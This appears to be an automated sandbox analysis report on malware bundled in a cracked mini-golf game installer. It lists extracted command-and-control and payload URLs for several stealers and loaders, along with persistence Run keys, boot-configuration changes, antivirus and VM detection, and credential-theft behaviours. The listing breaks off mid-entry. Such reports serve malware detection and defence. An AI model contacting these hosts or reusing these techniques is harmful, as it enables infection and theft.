Analysis
-
max time kernel
157s -
max time network
300s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22-03-2021 09:13
Static task
static1
Behavioral task
behavioral1
Sample
Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe
Resource
win10v20201028
General
-
Target
Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
cryptbot
basfs12.top
mormsd01.top
-
payload_url
http://akmes01.top/download.php?file=lv.exe
Extracted
raccoon
c46f13f8aadc028907d65c627fd9163161661f6c
-
url4cnc
https://telete.in/capibar
Extracted
raccoon
2ce901d964b370c5ccda7e4d68354ba040db8218
-
url4cnc
https://telete.in/tomarsjsmith3
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
icedid
4052159376
house34vegas.uno
Extracted
metasploit
windows/single_exec
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CryptBot Payload 2 IoCs
resource yara_rule behavioral1/memory/2484-104-0x0000000000DE0000-0x0000000000EBF000-memory.dmp family_cryptbot behavioral1/memory/2484-109-0x0000000000400000-0x00000000004E3000-memory.dmp family_cryptbot -
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Glupteba Payload 4 IoCs
resource yara_rule behavioral1/memory/6332-454-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral1/memory/6332-456-0x00000000039E0000-0x000000000423D000-memory.dmp family_glupteba behavioral1/memory/6332-457-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral1/memory/6544-476-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 796 created 6332 796 svchost.exe 228 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
IcedID First Stage Loader 1 IoCs
resource yara_rule behavioral1/memory/6540-354-0x0000000000A10000-0x0000000000A17000-memory.dmp IcedidFirstLoader -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
pid Process 10796 bcdedit.exe 10852 bcdedit.exe 10904 bcdedit.exe 10956 bcdedit.exe 11008 bcdedit.exe 11064 bcdedit.exe 11124 bcdedit.exe 11172 bcdedit.exe 11256 bcdedit.exe 10896 bcdedit.exe 10960 bcdedit.exe 11008 bcdedit.exe 11116 bcdedit.exe 4156 bcdedit.exe 7100 bcdedit.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\SETC4B3.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETC4B3.tmp DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 1940 keygen-pr.exe 3196 keygen-step-1.exe 2668 keygen-step-3.exe 1152 keygen-step-4.exe 676 key.exe 892 Setup.exe 2484 18346303869.exe 488 setups.exe 2216 Install.exe 3424 setups.tmp 4104 JZSeNrBW2SHXmrQOsDhEcB9n.exe 4408 multitimer.exe 4540 multitimer.exe 4888 79139104910.exe 4996 79139104910.exe 2484 18346303869.exe 3120 Setup3310.exe 4840 vict.exe 3744 askinstall24.exe 5084 IBInstaller_97039.exe 4648 vpn.exe 4124 AwesomePoolU1.exe 2192 Setup3310.tmp 5148 pcuwnkxw0yo.exe 5160 cpb0ufehxrl.exe 5192 vpn.tmp 5204 vict.tmp 4448 79139104910.exe 5268 IBInstaller_97039.tmp 5352 cpb0ufehxrl.tmp 5468 chrome_proxy.exe 5908 app.exe 6060 winhost.exe 4328 Setup.exe 4564 Setup.tmp 5608 ao6Cj5ztMuu8mv6NL8w0bG1N.exe 5628 xsisRmf9QYcorUoW9aDkaynv.exe 5640 FxfTx8erfPX6fyGtW3PtDbgN.exe 5688 QRTBeTEpQLFpEn8kg1g9vgl7.exe 4244 VbK9YfyeRvt8rDnUGnSrmaN1.exe 408 OTv1aoIKsmaXSh1jpUZgH0XD.exe 5116 6sUPec57VI5dpryixwk9LfT3.exe 3340 ao6Cj5ztMuu8mv6NL8w0bG1N.exe 2132 QN1ygxdObN4pGb2PLjmBuRxU.exe 5916 Ybpwj9zioycMdvwemGxd9rLc.exe 4916 ZgpxDlNt9WSJXcuF3ihBzWpL.exe 5220 1dqKDXdM3UJScuo9hogG4Vho.exe 2580 qeGMdNFSYbt9qljVPOXfGHbY.exe 5180 DsdXQewqsY5YG78RFSKRSEOp.exe 5216 dynboTs5K5sKXUxUcUOJZeiw.exe 5372 QN1ygxdObN4pGb2PLjmBuRxU.exe 1020 multitimer.exe 3128 setups.exe 1304 532568.5 6016 218944.2 5052 setups.tmp 6096 multitimer.exe 5932 setups.exe 6192 setups.tmp 6532 Delta.exe 6568 Delta.tmp 6808 tapinstall.exe 6848 multitimer.exe 6864 6948904.76 -
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 64 IoCs
pid Process 3424 setups.tmp 3424 setups.tmp 3424 setups.tmp 3424 setups.tmp 3424 setups.tmp 3424 setups.tmp 3424 setups.tmp 2192 Setup3310.tmp 2192 Setup3310.tmp 5204 vict.tmp 5268 IBInstaller_97039.tmp 5352 cpb0ufehxrl.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 4448 79139104910.exe 4564 Setup.tmp 4564 Setup.tmp 3340 ao6Cj5ztMuu8mv6NL8w0bG1N.exe 4448 79139104910.exe 4448 79139104910.exe 4448 79139104910.exe 4448 79139104910.exe 4448 79139104910.exe 4448 79139104910.exe 4448 79139104910.exe 5372 QN1ygxdObN4pGb2PLjmBuRxU.exe 5052 setups.tmp 5052 setups.tmp 5052 setups.tmp 5052 setups.tmp 5052 setups.tmp 5052 setups.tmp 5052 setups.tmp 6192 setups.tmp 6192 setups.tmp 6192 setups.tmp 6192 setups.tmp 6192 setups.tmp 6192 setups.tmp 6192 setups.tmp 4244 VbK9YfyeRvt8rDnUGnSrmaN1.exe 4244 VbK9YfyeRvt8rDnUGnSrmaN1.exe 6504 regsvr32.exe 6540 regsvr32.exe 6568 Delta.tmp 6568 Delta.tmp 2580 qeGMdNFSYbt9qljVPOXfGHbY.exe 2580 qeGMdNFSYbt9qljVPOXfGHbY.exe 7048 setups.tmp 7048 setups.tmp 7048 setups.tmp 7048 setups.tmp 7048 setups.tmp 7056 setups.tmp 7056 setups.tmp 7048 setups.tmp 7048 setups.tmp 7056 setups.tmp -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\FEoanooX7sxpIUV3eAyfcsPPm3JeaVnO = "C:\\Users\\Admin\\Documents\\8upE3bO9YV344wHJOSFDzu7k.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\EUqaBROWksyoHHDjB6AKRo4UPcOjgZW4 = "C:\\Users\\Admin\\Documents\\U2Cl2DoTZvBnWeOvdrSHjZIr.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\4XlVZAWAnfaLOU1XALFqGWRUyBXGfF3T = "C:\\Users\\Admin\\Documents\\lYYpVmunjxQg1PIJBckxYSCD.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\u9iy6JfUm7X2BXGvPgeJfhqxvGGyxHp5 = "C:\\Users\\Admin\\Documents\\Wfi0TOPfmloLDsDxcLMq4bdX.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\juXyL7d5AsIPiDmzIXMnPfwCE4LMfG4g = "C:\\Users\\Admin\\Documents\\2dA6WFsUerj5e4dTDyC4YVC8.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\v7KVw1OZSUwwbNsjKtXq6zMxTwE6xHl6 = "C:\\Users\\Admin\\Documents\\nv5iliCYe9DrdfpvkOrM1qEL.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\FwDpGx2vvJ1wDvHZpUp2zdE35vu3M5AE = "C:\\Users\\Admin\\Documents\\IG1PZB1Vp4ilBBwAnUnJGDQG.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Im2PmtzRRhGuerqDyQZa70l4rFI4nZrv = "C:\\Users\\Admin\\Documents\\7lAYAlPhhVGZi7icF1K2nLmu.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\r38t4LeRRmYmXljjqE2AkmLJC5XEsk4W = "C:\\Users\\Admin\\Documents\\Ik6bNt1ppcy1ezSbzdSqKwy4.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\po0ZFjMkBMZQrlwMt0YzYlkgTPZlX3E3 = "C:\\Users\\Admin\\Documents\\Q1pk5N9txZdxJHMFIftq4Wi3.exe" Install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4h44bbjlhbh = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\NO92LULRG2\\multitimer.exe\" 1 3.1616404552.605860487b8d4" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\sG7kfrtUDSemW7JFVzzWJCVJtDt6FDmi = "C:\\Users\\Admin\\Documents\\qeGMdNFSYbt9qljVPOXfGHbY.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\W6JNywsEyLy0qHsKKjD1ehPZox83uL0h = "C:\\Users\\Admin\\Documents\\IlEUas5gYkGzITU8BfGmMlpX.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Muavi Music Player ZMH37_A uajSl sUef6w2eFHZ zEhcdPn E6 = "C:\\Users\\Admin\\AppData\\Roaming\\MicrosoftzLBeHDEzTWeTIErY1sqD3jjDUpdater.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\apa1Q4HE66I7M00HPOZUSKZpthAMYCIf = "C:\\Users\\Admin\\Documents\\1dqKDXdM3UJScuo9hogG4Vho.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wQF0C4wvEe6XsOss5EkP4ouPpQ9vQsdY = "C:\\Users\\Admin\\Documents\\9xJKkCz1AFjuXmroJy4cQk5w.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\QvIs44q4xmALGcKmSaHNy2CCuTY9Kcjs = "C:\\Users\\Admin\\Documents\\6BtX7m69MEVgmrwqyZ1p6NVP.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\CbBdgyQfvN09rYzG6vFLaH4davh0xajG = "C:\\Users\\Admin\\Documents\\YGRwxDY9dsciEjb6vCPhMSua.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SXnnrewozOIDBFTCtbLT4dUVChFTQEIU = "C:\\Users\\Admin\\Documents\\9trRdWkz3SzpvdqyuZ2F1pU0.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\u0E6CsqF7ZLnNnsDpO0fWWD5rTDYaRuy = "C:\\Users\\Admin\\Documents\\gIvhbbwKveejWNoP5u9oNrWX.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\BXlf4P9fLHpIhJs6npPa5TSRydNrQzh6 = "C:\\Users\\Admin\\Documents\\vJ6D8dijiZQMvBmv5Ln6xzzE.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SlhF15GPLvLjKKyg4dOMnKmyv9tfdE0h = "C:\\Users\\Admin\\Documents\\f03Bol0cDNa4xn6b6i9jc7fr.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\0Zfrtg2ISwMBbyTLk7vJoskOWgdua1UW = "C:\\Users\\Admin\\Documents\\xIxxJqzCrXmMjRtjU9wHxaSZ.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wDYf6aITqkLpHXLsatkLO2YtogUiHGj8 = "C:\\Users\\Admin\\Documents\\dynboTs5K5sKXUxUcUOJZeiw.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\R9EDZr6xUhDqFoy7vCaqCrN1OXt4FJxZ = "C:\\Users\\Admin\\Documents\\nzRLfVeaTTKUH2pdclWF8Oku.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\sJtVD8i0Jx7SlebcGxzDoMt6y1p8aOqb = "C:\\Users\\Admin\\Documents\\zvKm8MO1Cwz2K972NNevYYQl.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\6tOpKqCb3WLvayYOVt9N0VnKBtCXxfZd = "C:\\Users\\Admin\\Documents\\S6ilxIHYpbwwRGhh7mhbwz7x.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\yYxueJ7mFj2DVfGqoEy6vDQK2PhOwyRV = "C:\\Users\\Admin\\Documents\\xF8zxyVurf7L8bA47Liz6bIX.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\sGEbRFZx3c6AfR9X2KhMEU1YKDwxFD6D = "C:\\Users\\Admin\\Documents\\scLNHSJ7KMQOdZvarOdxqo0W.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\OqQNSlszg3Yrv9KKfcZlA16aJWj9Ia58 = "C:\\Users\\Admin\\Documents\\myfANspFwdUAcu4aOG5fHnSX.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\qMAyzVmdleR5xwLXqGJLk9WYDUvHFa5J = "C:\\Users\\Admin\\Documents\\YvFtGFhOHf8ON3DPrM5ViOUc.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\OP6bInVs4GMdbV339Ata62KkNGz8m52t = "C:\\Users\\Admin\\Documents\\QRTBeTEpQLFpEn8kg1g9vgl7.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\EWOCyWF8OdxFhngWcGjjINIr7nA85H5d = "C:\\Users\\Admin\\Documents\\pWxPWmhn0Xu7bfIL8nAvxLAV.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\xBCTWZMfdABBsiA840sqUybR6hOPBiAT = "C:\\Users\\Admin\\Documents\\a50x7YZEurMC6g5M2Dx7uGCX.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ladbXCUfy9NIwtXxZUQFluIGytV0sJJ9 = "C:\\Users\\Admin\\Documents\\HupSs6y82Nxoo9ldhHMSaIu6.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\yR13VHNxp7hOMzKd7ignmusqTMqbAD3B = "C:\\Users\\Admin\\Documents\\0jCKwMAKx30NFXjSCw2CVzOB.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\IqxED2G9IgbCoIqgdSYWc3JUV8PRQmLA = "C:\\Users\\Admin\\Documents\\lz52wGHWvbUPfEnGjDNEelTA.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\hKHGhIGXmnFeRf1jRlk2wUqQbU433QIH = "C:\\Users\\Admin\\Documents\\JZSeNrBW2SHXmrQOsDhEcB9n.exe" Install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\khn02elui3b = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ILE6DHUI4G\\multitimer.exe\" 1 3.1616404552.60586048996f8" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\BnTjsS7arYWXeebOrRV9VbKMyJhavDJg = "C:\\Users\\Admin\\Documents\\qPrBNevR0Zzqf4rNjZ0FqJsx.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\YsIsXe5Rr6XkvYZb4NuXJJzKZHfHhUbE = "C:\\Users\\Admin\\Documents\\BLmDaHSi8Yj364r1dm0xe7xt.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\OgFKVGDGhTuFdh87RFSXdKA4Ap1SzO15 = "C:\\Users\\Admin\\Documents\\VbK9YfyeRvt8rDnUGnSrmaN1.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\GQhXmPeilGy3i3Xm7gO0c4f1FqfTTrGA = "C:\\Users\\Admin\\Documents\\WVv8AYNibP3Wz65rlMwMMV6h.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SbfA7MyAeJhZtLZPjma5xkSZOYAD2Ban = "C:\\Users\\Admin\\Documents\\T2C4YsaavDx2T4xUVmZ6QpNr.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\hiDuRZsUoun0odECRatdTDu8gLnozI2y = "C:\\Users\\Admin\\Documents\\W0uVC4doc6x0sbOWNJlbNi95.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Pyb0VZLtITzlmmJMTovr9bhtA8plV2ct = "C:\\Users\\Admin\\Documents\\fPwIxCKSUS1IykDqaj6fsvHp.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\8bXoGg9VkAlDgTYumd6clemNfexdTB1V = "C:\\Users\\Admin\\Documents\\RJtowoo9S2GLhzsD1pXml6bb.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\d1oMOMdWf7Emiz9Vw0qCjrnqXrr5dSqT = "C:\\Users\\Admin\\Documents\\ao6Cj5ztMuu8mv6NL8w0bG1N.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\umzZWEQD2BspQQ8FoA08AILvv1zyXzP1 = "C:\\Users\\Admin\\Documents\\n9RSmf1AbHZWjVg1gfcd5v2e.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\xENGwDfg1y8zpkKiCrP11vKId2jQ9F9V = "C:\\Users\\Admin\\Documents\\1zxd1sXCOcL8yYruFjJxyfld.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ryq8yaiqsB0V2OziTYCCCUsX0JK9kyc7 = "C:\\Users\\Admin\\Documents\\vBtUuIve7hk1bpEN4t9F3yUE.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\BAb0CzAhl9TIquRMCiJ67XdM3YiAA6JV = "C:\\Users\\Admin\\Documents\\cBvsD2MZNCPdtbIcfdfRoHy5.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\5vcCFaWORxoUmW4N1773pkmtSMaoAsar = "C:\\Users\\Admin\\Documents\\Ybpwj9zioycMdvwemGxd9rLc.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\7UTz6R4bPjSqfWzTTQct9MCUu31MfcOv = "C:\\Users\\Admin\\Documents\\MlZOfzLbrNuZ4ZjK0S5pVa7k.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\2BrQ6wiOLgmIiDPaycx3MyhhX7YqCF5w = "C:\\Users\\Admin\\Documents\\RiIDWGi7CvFMpFaktKFphepl.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbeMzWdoqz1YvXc0iNwtwtCvEH99tYH5 = "C:\\Users\\Admin\\Documents\\MsvFe5TI5bDPtyTdP6cZAQqk.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\AQqKy7m6ButilQsh7n9B1je8Uw41RyhV = "C:\\Users\\Admin\\Documents\\7UwXzVklPOuV5vWRAcIT9lh9.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vr0CCvpNNXvy3J3i0qZDPT6gGLHqdLtQ = "C:\\Users\\Admin\\Documents\\wxWioZwSlxTLCypttkVVmgHa.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vU51n8tBnfJ8W58Gak4JVSdPVh8pqyJk = "C:\\Users\\Admin\\Documents\\p5x7juPzIG7oC1zkrxf5GELc.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\N8zgfi2NRuyzQQEKVqvLP98DDU5DOF38 = "C:\\Users\\Admin\\Documents\\xsisRmf9QYcorUoW9aDkaynv.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\DoadLCT3GlJSSYNsazBUDHYjWtsZensO = "C:\\Users\\Admin\\Documents\\1TRcxiNaEJPnANuJvwE8rnEp.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Q0GbU4Zd35Dq9EkqkAerl8g42WzIFzmf = "C:\\Users\\Admin\\Documents\\PlZIHtOB0VgZDc1WjWi2ltm5.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\5PX6rFak4LMVpijklgBRFaevGRtWU0TL = "C:\\Users\\Admin\\Documents\\Ip8Mh9bjG1rTiwqLZGFD97C8.exe" Install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\f8GMTJRbPkprMpJFuETCiSF5Bml3WrXY = "C:\\Users\\Admin\\Documents\\rOk3bd5srhETo0AVyQzenSGz.exe" Install.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened 